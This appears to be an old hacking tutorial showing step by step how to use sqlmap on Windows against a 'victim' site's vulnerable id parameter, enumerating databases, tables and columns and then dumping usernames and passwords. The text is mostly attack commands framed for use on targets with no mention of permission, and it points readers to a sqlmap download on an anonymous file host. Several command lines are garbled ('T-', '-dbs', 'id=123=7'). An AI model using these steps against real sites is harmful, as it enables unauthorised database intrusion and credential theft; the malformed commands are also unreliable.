SQL map tuts for windows

Sqlmap Tutorial For Window 7/ Windows Vista/


Today im gonna teach you about sqlmap on windows 7

-----------------------------------------------------------------------------------------------------------

What do you need?
[python download for windows]
http://www.activestate.com/activepython/downloads

[Sqlmap windows]
https://anonfiles.com/file/940b85380aa870641683822972540d63

First.. After you download and install python you must download Sqlmap for windows
After download it .. [Sqlmap Windows]
extract the file in Drive C

-----------------------------------------------------------------------------------------------------------

After that open your Command Prompt (CMD)
Type   cd\
And then press ENTER
Type cd sqlmap\
And Enter

http://i42.tinypic.com/avlf75.jpg

Copy your victim link
And type to cmd like this

sqlmap.py -u http://yoursite.com/index.php?id=123 --dbs

Replace http://yoursite.com/index.php?id=123 to your link target
Enter!

-----------------------------------------------------------------------------------------------------------

The injected site will show the Database
My testing site http://site.com/gallery.php?id=7
Example Database Shown Is : lala_db
                                              information_schema

If you want choose any database
you must do like shown above
sqlmap.py -u http://site.com/index.php?id=123=7 -dbs databasename example "lalala"

-----------------------------------------------------------------------------------------------------------

-D (for Database)
databasename for example i put 'lala_db' for get the table
So my site will like this

sqlmap.py -u http://site.com/index.php?id=1 -D database_name --tables

For your site
--> sqlmap.py -u http://ssite.com/index.php?id=1 -D databasename --tables
Press Enter!

you will get a lot of tables
such as

[ users ]
[ category ]
[ links ]

from the tables , choose one of your target to get Username and Password

then your code in cmd will be like this

sqlmap.py -u http://site.com/index.php?id=1 -D database -T your target tables

My code in cmd will shown like
sqlmap.py -u http://site.com/index.php?id=1 -D databasename -T users

-----------------------------------------------------------------------------------------------------------

Alright , we go to the next
what you must do is to get column
just add --columns after your code
it will be show like this

sqlmap.py -u http://site.com/index.php?id=1 -D databasename T- your target tables --columns

Example :
sqlmap.py -u http://site.com/index.php?id=1 -D database T- users --columns

-----------------------------------------------------------------------------------------------------------

The tables will show the columns
such as users contain :

[ email ]
[ id ]
[ name ]
[ username ]
[ password ]

what you must to do is
adding   -C username --dump   behind

example :

sqlmap.py -u http://site.com/index.php?id=1 -D database -T users -C username --dump

Yes you get it
Username is : blablabla

then do the same thing , but this to get 'password'
Example :
sqlmap.py -u http://site.com/index.php?id=1 -D database T- users -C password --dump

The password is : blablabla

-----------------------------------------------------------------------------------------------------------
Warning! : If you get the database , tables and columns
''  --  '' this string must be a one
such as like this

from database
--> after injected
--> the database are showed

the word database and the double string ( -- )
will be change
it will be like -D
the word database will short and be D
the word D must be a big word

-T   /  -C

( --dump ) do not change this string

After the big word such as -D
You must give one space

--->   -D database

-----------------------------------------------------------------------------------------------------------

THE END !
Like this page :)
https://www.facebook.com/Str1.k3r.gov